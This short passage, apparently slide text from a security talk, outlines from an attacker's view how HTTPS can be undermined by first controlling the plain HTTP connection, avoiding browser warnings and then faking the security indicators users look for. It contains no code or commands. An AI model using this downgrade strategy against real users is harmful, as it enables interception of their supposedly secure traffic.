Lots of times the security of HTTPS comes down 
to the security of HTTP, and HTTP is not secure. 

If we want to avoid the dialogs of death, start 
with HTTP not HTTPS. 

Once we've got control of that, we can do all 
kinds of stuff to re-introduce the positive 
indicators people might miss. 



